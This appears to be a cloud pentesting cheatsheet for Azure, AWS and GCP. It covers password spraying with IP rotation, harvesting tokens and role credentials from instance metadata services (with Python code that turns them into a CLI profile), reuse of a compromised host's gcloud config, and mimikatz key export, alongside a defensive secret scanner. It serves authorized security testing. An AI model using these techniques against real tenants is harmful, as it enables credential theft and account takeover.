Cloud Pentesting Cheatsheet
Az PowerShell Module
Import-Module Az
Authentication
Connect-AzAccount
$credential = Get-Credential
Connect-AzAccount -Credential $credential
Account Information
Get-AzContext -ListAvailable
List subscriptions
Get-AzSubscription
Choose a subscription
Get-AzRoleAssignment
Get-AzResource
Get-AzResourceGroup
Get-AzStorageAccount
Get-AzADApplication
Get-AzWebApp
Individual databases can be listed with information retrieved from the previous command
Runbooks
Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
Virtual Machines
Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile
Run commands on VMs
Networking
Get-AzVirtualNetwork
Get-AzPublicIpAddress
Get-AzExpressRouteCircuit
Backdoors
Authentication
Connect-MsolService
$credential = Get-Credential
Connect-MsolService -Credential $credential
Get-MSolCompanyInformation
Get-MSolUser -All
Get-MSolGroup -All
Get-MSolUser -All | fl
Az CLI Tool
Authentication
az login
List out any key vault resources the current account can view
With Contributor on a vault that uses the access-policy permission model you can add an access policy granting yourself secret list/get and then read the secrets; on a vault using the Azure RBAC permission model, Contributor cannot assign roles, so data-plane access needs an existing Key Vault data role or the right to assign one.
Azure instance metadata service (IMDS), link-local and only reachable from inside the VM/App Service:
http://169.254.169.254/metadata
Request a managed-identity token for ARM (the Metadata: true header is mandatory):
GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1
Metadata: true
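As an added example (editor's code, not from the original cheatsheet or from Microsoft), the Python below builds the IMDS token request shown above, parses the JSON that IMDS returns, and decodes the token's claims so you know which tenant and identity the host holds before spending it. The endpoint, api-version and header are the documented ones; `fetch_token` only succeeds on an Azure host with a managed identity, so the module also carries a constructed sample response with dummy IDs and a fake signature for offline use.

```python
"""Azure IMDS: request a managed-identity token and inspect it (added example)."""
import base64
import json
import urllib.parse
import urllib.request

IMDS = "http://169.254.169.254/metadata/identity/oauth2/token"
API_VERSION = "2018-02-01"


def imds_token_request(resource="https://management.azure.com/", client_id=None):
    """Build the token request. IMDS requires the Metadata: true header and
    rejects requests carrying X-Forwarded-For, so it cannot be proxied."""
    params = {"api-version": API_VERSION, "resource": resource}
    if client_id:                      # select a specific user-assigned identity
        params["client_id"] = client_id
    url = IMDS + "?" + urllib.parse.urlencode(params)
    return url, {"Metadata": "true"}


def fetch_token(resource="https://management.azure.com/", timeout=3):
    """Only works from inside an Azure VM/App Service with a managed identity."""
    url, headers = imds_token_request(resource)
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_token_response(resp.read().decode())


def parse_token_response(body):
    data = json.loads(body)
    return {
        "access_token": data["access_token"],
        "expires_on": int(data["expires_on"]),   # unix time, returned as a string
        "resource": data["resource"],
        "token_type": data.get("token_type", "Bearer"),
    }


def _b64url_decode(segment):
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def jwt_claims(token):
    """Read the JWT payload without verifying the signature: we are not the
    intended verifier, we only want to know which identity and tenant we hold."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT")
    return json.loads(_b64url_decode(parts[1]))


def describe_identity(claims):
    """The claims a pentester cares about: tenant, app/object id, audience."""
    return {
        "tenant": claims.get("tid"),
        "app_id": claims.get("appid"),
        "object_id": claims.get("oid"),
        "audience": claims.get("aud"),
        "identity_type": claims.get("idtyp"),
    }


# Constructed sample: the shape of a real managed-identity token with dummy
# values and a fake signature, so the parsing path can be exercised offline.
def _b64url(obj):
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()


SAMPLE_CLAIMS = {
    "aud": "https://management.azure.com/",
    "tid": "11111111-2222-3333-4444-555555555555",
    "appid": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
    "oid": "99999999-8888-7777-6666-555555555555",
    "idtyp": "app",
    "exp": 1700003600,
}
SAMPLE_TOKEN = _b64url({"alg": "RS256", "typ": "JWT"}) + "." + _b64url(SAMPLE_CLAIMS) + ".c2ln"
SAMPLE_RESPONSE = json.dumps({
    "access_token": SAMPLE_TOKEN,
    "expires_on": "1700003600",
    "resource": "https://management.azure.com/",
    "token_type": "Bearer",
})

if __name__ == "__main__":
    tok = parse_token_response(SAMPLE_RESPONSE)
    print(describe_identity(jwt_claims(tok["access_token"])))
```

Once you have a real token, the `aud` claim tells you which API it is good for (ARM here; request `https://vault.azure.net` or `https://graph.microsoft.com` as the resource for Key Vault or Graph) and `tid`/`oid` identify the principal whose role assignments you then enumerate with Get-AzRoleAssignment.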
MicroBurst
https://github.com/NetSPI/MicroBurst
Get-AzPasswords -ExportCerts Y
Get-AzPasswords
Get-AzACR
PowerZure
https://github.com/hausec/PowerZure
ROADTools
Framework to interact with Azure AD
https://github.com/dirkjanm/ROADtools
Stormspotter
https://github.com/Azure/Stormspotter
MSOLSpray
https://github.com/dafthack
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
AWS CLI
Authentication
Set AWS programmatic keys for authentication (add --profile <name> to create a separate named profile)
aws configure
aws s3 ls s3://<bucketname>/
aws s3 ls
Virtual Machines
aws ec2 describe-security-groups --group-ids <VPC Security Group ID> --region <region>
Serverless
Networking
Backdoors
http://169.254.169.254/latest/meta-data
Instance role credentials may be available under /latest/meta-data/iam/security-credentials/<role-name> (request the directory first to learn the role name)
Can potentially be reached externally through SSRF when a proxy service (like Nginx) hosted in AWS is misconfigured to forward arbitrary URLs
IMDS Version 2 adds protections: a PUT to /latest/api/token with the X-aws-ec2-metadata-token-ttl-seconds header returns a session token that every later GET must carry in X-aws-ec2-metadata-token, and the default hop limit of 1 stops the token response leaving the instance, so a GET-only SSRF cannot reach IMDSv2; the same requests still work wherever IMDSv1 remains enabled
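As an added example (editor's code, not from the original cheatsheet or from AWS), the Python below performs the IMDSv2 two-step flow described above, turns the credential document into a ready-to-use `~/.aws/credentials` profile, and shows why a GET-only SSRF stops at v2. Header names and paths are the documented ones; `fetch_role_credentials` only works on an EC2 instance, so a constructed credential document with dummy values is embedded for offline use.

```python
"""AWS IMDSv2: session token, role credentials, and a CLI profile (added example)."""
import json
import urllib.request

IMDS = "http://169.254.169.254"
TOKEN_TTL_HEADER = "X-aws-ec2-metadata-token-ttl-seconds"
TOKEN_HEADER = "X-aws-ec2-metadata-token"


def token_request(ttl_seconds=21600):
    """IMDSv2 step 1: a PUT with a TTL header. A GET-only SSRF cannot issue it,
    and the default hop limit of 1 drops the response when it has to cross a
    container bridge network on its way back."""
    return "PUT", f"{IMDS}/latest/api/token", {TOKEN_TTL_HEADER: str(ttl_seconds)}


def metadata_request(path, token=None):
    """IMDSv2 step 2: every metadata GET carries the token. Without a token this
    is the plain IMDSv1 request, which works only if the instance still allows v1."""
    headers = {TOKEN_HEADER: token} if token else {}
    return "GET", f"{IMDS}/latest/meta-data/{path.lstrip('/')}", headers


def _send(method, url, headers, timeout=2):
    req = urllib.request.Request(url, method=method, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


def fetch_role_credentials():
    """Full flow; only works on an EC2 instance (or via an SSRF that can PUT)."""
    token = _send(*token_request())
    role = _send(*metadata_request("iam/security-credentials/", token)).strip()
    body = _send(*metadata_request(f"iam/security-credentials/{role}", token))
    return role, parse_credentials(body)


def parse_credentials(body):
    """Pick the three values the CLI needs out of the credential document."""
    data = json.loads(body)
    if data.get("Code") != "Success":
        raise ValueError(f"credential document not usable: {data.get('Code')}")
    return {
        "aws_access_key_id": data["AccessKeyId"],
        "aws_secret_access_key": data["SecretAccessKey"],
        "aws_session_token": data["Token"],   # temporary creds are useless without it
        "expiration": data["Expiration"],
    }


def as_profile(creds, name="imds"):
    """Render a ~/.aws/credentials section for `aws --profile <name> ...`."""
    lines = [f"[{name}]"]
    for key in ("aws_access_key_id", "aws_secret_access_key", "aws_session_token"):
        lines.append(f"{key} = {creds[key]}")
    return "\n".join(lines) + "\n"


# Constructed sample of the document IMDS returns for a role; dummy values only.
SAMPLE_CREDENTIALS = json.dumps({
    "Code": "Success",
    "LastUpdated": "2024-01-01T00:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLEEXAMPLE00",
    "SecretAccessKey": "exampleSecretKeyDoNotUse0000000000000000",
    "Token": "exampleSessionToken",
    "Expiration": "2024-01-01T06:00:00Z",
})

if __name__ == "__main__":
    print(as_profile(parse_credentials(SAMPLE_CREDENTIALS)))
```

Append the rendered section to `~/.aws/credentials` and confirm what you hold with `aws --profile imds sts get-caller-identity` before running broader enumeration (WeirdAAL or Pacu below); the `expiration` field tells you how long the session token is good for.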
WeirdAAL
https://github.com/carnal0wnage/weirdAAL
Run recon against all AWS services to enumerate access for a set of keys
Pacu
https://github.com/RhinoSecurityLabs/pacu
Install Pacu
sudo apt-get install python3-pip
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
sudo bash install.sh
Useful modules once inside the Pacu shell (load the keys first with set_keys):
run iam__detect_honeytokens
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
whoami
run iam__privesc_scan
GCP (gcloud CLI)
Authentication
Account Information
List organizations
List projects
Virtual Machines
gcloud beta compute ssh --zone "<zone>" "<instance name>" --project "<project id>"
From inside an instance, read the default service account's OAuth scopes from the metadata server:
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor: Google'
Storage Buckets
gsutil cp gs://bucketid/item ~/
gsutil cp -r gs://bucket-name/folder/ .
Networking
List subnets
Containers
The GCP Kubernetes config file ~/.kube/config is generated when you are authenticated with gcloud and fetch the cluster credentials:
If that succeeds and the user has the required permission, the Kubernetes command below can be used to get cluster info:
kubectl cluster-info
Serverless
GCP functions log analysis: logs associated with GCP functions may contain useful information
gcloud functions list
gcloud functions describe <function name>
gcloud functions logs read <function name> --limit <number of lines>
Copy the gcloud config dir (~/.config/gcloud) from a compromised host to your own home directory to auth as the compromised user
Dump everything the metadata server exposes to an instance (attributes, service accounts, tokens) in one request:
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
ScoutSuite
Multi-cloud security auditing tool
Install ScoutSuite
To run as root
sudo apt-get install virtualenv
sudo su
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
or if installed...
Cloud_Enum
Tool to search for public resources in AWS, Azure, and GCP
https://github.com/initstring/cloud_enum
GitLeaks
Search repositories for secrets
https://github.com/zricethezav/gitleaks
TruffleHog - https://github.com/dxa4481/truffleHog
Shhgit - https://github.com/eth0izzle/shhgit
Gitrob - https://github.com/michenriksen/gitrob
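As an added example (editor's code, not the code of GitLeaks, TruffleHog, Shhgit or Gitrob), the Python below shows the two techniques those tools combine: fixed-format rules for secrets with a known shape, and a Shannon-entropy fallback for ones without. The AKIA/ASIA prefix rule and the sample key id/secret are AWS's published documentation examples, the AccountKey value is constructed base64, and the 4.5 bits/char threshold is an assumed cut-off.

```python
"""Regex + entropy secret scanner for repository text (added example)."""
import math
import os
import re

# Fixed-format rules. AKIA/ASIA are AWS's documented access-key-id prefixes;
# the other patterns match well-known headers and connection-string fields.
RULES = {
    "aws_access_key_id": re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[0-9A-Z]{16}(?![A-Z0-9])"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA |)PRIVATE KEY-----"),
    "gcp_service_account": re.compile(r'"type"\s*:\s*"service_account"'),
    "azure_storage_key": re.compile(r"AccountKey=[A-Za-z0-9+/]{40,}={0,2}"),
}

# TruffleHog-style fallback for secrets with no fixed shape (e.g. AWS secret keys):
# long base64-looking tokens whose Shannon entropy is high. 4.5 bits/char is an
# assumed cut-off; tune it against your own corpus to balance noise and misses.
ENTROPY_CANDIDATE = re.compile(r"[A-Za-z0-9+/=_\-]{20,}")
ENTROPY_THRESHOLD = 4.5


def shannon_entropy(s):
    """Bits per character of the string's character distribution."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(text, filename="<stdin>"):
    """Return findings as (filename, line_no, rule, matched_text).
    Entropy is only consulted on lines with no fixed-rule hit, so a key that a
    rule already explains is not reported twice."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        hits = [(rule, m.group(0)) for rule, rx in RULES.items() for m in rx.finditer(line)]
        if not hits:
            for m in ENTROPY_CANDIDATE.finditer(line):
                if shannon_entropy(m.group(0)) >= ENTROPY_THRESHOLD:
                    hits.append(("high_entropy", m.group(0)))
        findings.extend((filename, line_no, rule, match) for rule, match in hits)
    return findings


def scan_path(root):
    """Walk a checked-out repo (skipping .git) and scan every file as text."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                findings.extend(scan_text(fh.read(), path))
    return findings


# Constructed sample file. The AWS key id/secret are AWS's published documentation
# examples, the AccountKey is base64 of a sentence; nothing here is a live secret.
SAMPLE_FILE = """\
# constructed config, every value here is fake
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
DefaultEndpointsProtocol=https;AccountName=acct;AccountKey=aGVsbG8gd29ybGQgdGhpcyBpcyBub3QgYSByZWFsIGtleSBhdCBhbGw=;
-----BEGIN RSA PRIVATE KEY-----
MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu
-----END RSA PRIVATE KEY-----
log_level = info
"""

if __name__ == "__main__":
    for filename, line_no, rule, match in scan_text(SAMPLE_FILE, "config.txt"):
        print(f"{filename}:{line_no}: {rule}: {match}")
```

Note what the entropy rule buys and costs: the AWS secret key on line 3 has no prefix a regex could anchor on and is only caught by entropy, while identifier-like strings such as `aws_secret_access_key` fall well under the threshold. PEM bodies also trip the entropy rule, which is why the real tools scan commit history rather than just the working tree and let you tune or suppress rules per repository.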
Mimikatz
Export Non-Exportable Private Keys From Web Server (local machine certificate store)
mimikatz# privilege::debug
mimikatz# crypto::capi
mimikatz# crypto::cng
mimikatz# crypto::certificates /systemstore:local_machine /store:my /export
Shell history files to check for cloud CLI usage and pasted credentials:
~/.bash_history
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PowerView
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
Find the on-prem Azure AD Connect (ADConnect) account name and server:
Get-NetUser -Filter "(samAccountName=MSOL_*)" | Select-Object name,description | fl
FireProx
Password spraying Azure/O365 while rotating source IPs: FireProx creates AWS API Gateway endpoints that proxy each request from a different IP, so spraying tools like MSOLSpray can be pointed at the gateway URL instead of the login endpoint directly
Install
Launch FireProx
ip2Provider
Check a list of IP addresses against cloud provider IP space
https://github.com/oldrho/ip2provider
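As an added example (editor's code, in the spirit of ip2provider but not its code), the Python below maps a list of IPs onto provider ranges with longest-prefix matching, so a service-specific range wins over the broad provider range that contains it. `load_aws_ranges` parses the format of https://ip-ranges.amazonaws.com/ip-ranges.json; the embedded sample uses RFC 5737/RFC 3849 documentation prefixes rather than real provider ranges, and the Azure/GCP entries are constructed placeholders for the equivalent published lists.

```python
"""Map IP addresses to cloud provider ranges (added example)."""
import ipaddress
import json


def load_aws_ranges(ip_ranges_json):
    """Parse the ip-ranges.json shape into (network, label) pairs; the label
    keeps region and service because that is what you want in a report."""
    data = json.loads(ip_ranges_json)
    ranges = []
    for p in data.get("prefixes", []):
        ranges.append((ipaddress.ip_network(p["ip_prefix"]),
                       f"AWS/{p['region']}/{p['service']}"))
    for p in data.get("ipv6_prefixes", []):
        ranges.append((ipaddress.ip_network(p["ipv6_prefix"]),
                       f"AWS/{p['region']}/{p['service']}"))
    return ranges


def classify(ip, ranges):
    """Longest-prefix match: the S3 /26 beats the AMAZON /24 that contains it."""
    addr = ipaddress.ip_address(ip)
    best = None
    for net, label in ranges:
        if addr.version == net.version and addr in net:
            if best is None or net.prefixlen > best[0].prefixlen:
                best = (net, label)
    return best[1] if best else None


def check_ips(ips, ranges):
    """Return {ip: label or None}; unparsable entries are reported, not raised,
    so one bad line in a scan export does not abort the whole run."""
    out = {}
    for raw in ips:
        raw = raw.strip()
        if not raw:
            continue
        try:
            out[raw] = classify(raw, ranges)
        except ValueError:
            out[raw] = "invalid"
    return out


# Constructed sample in the ip-ranges.json shape. The prefixes are documentation
# addresses (RFC 5737 / RFC 3849), not real AWS ranges.
SAMPLE_AWS_JSON = json.dumps({
    "prefixes": [
        {"ip_prefix": "203.0.113.0/24", "region": "us-east-1", "service": "AMAZON"},
        {"ip_prefix": "203.0.113.0/26", "region": "us-east-1", "service": "S3"},
    ],
    "ipv6_prefixes": [
        {"ipv6_prefix": "2001:db8::/32", "region": "eu-west-1", "service": "EC2"},
    ],
})

# Constructed placeholders standing in for the Azure and GCP published lists.
EXTRA_RANGES = [
    (ipaddress.ip_network("198.51.100.0/24"), "Azure/constructed"),
    (ipaddress.ip_network("192.0.2.0/24"), "GCP/constructed"),
]

if __name__ == "__main__":
    ranges = load_aws_ranges(SAMPLE_AWS_JSON) + EXTRA_RANGES
    targets = ["203.0.113.10", "203.0.113.200", "198.51.100.7", "2001:db8::1", "8.8.8.8", "nope"]
    for ip, label in check_ips(targets, ranges).items():
        print(f"{ip:20} {label}")
```

For a real engagement, feed the downloaded provider JSON files in and run the resolved IPs from your external footprint through it; a hit in a service-specific range (S3, CloudFront, API Gateway) tells you which cloud-side enumeration to do next.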
SadCloud - https://github.com/nccgroup/sadcloud
Huge thanks to all the cloud pentesting blog/book authors & open source developers!
Lee Kagan @invokethreatguy & Lares - Blog | Resources | Lares Consulting, LLC
Oddvar Moe @Oddvarmoe & TrustedSec - Cybersecurity Education from the Experts | TrustedSec Blog Posts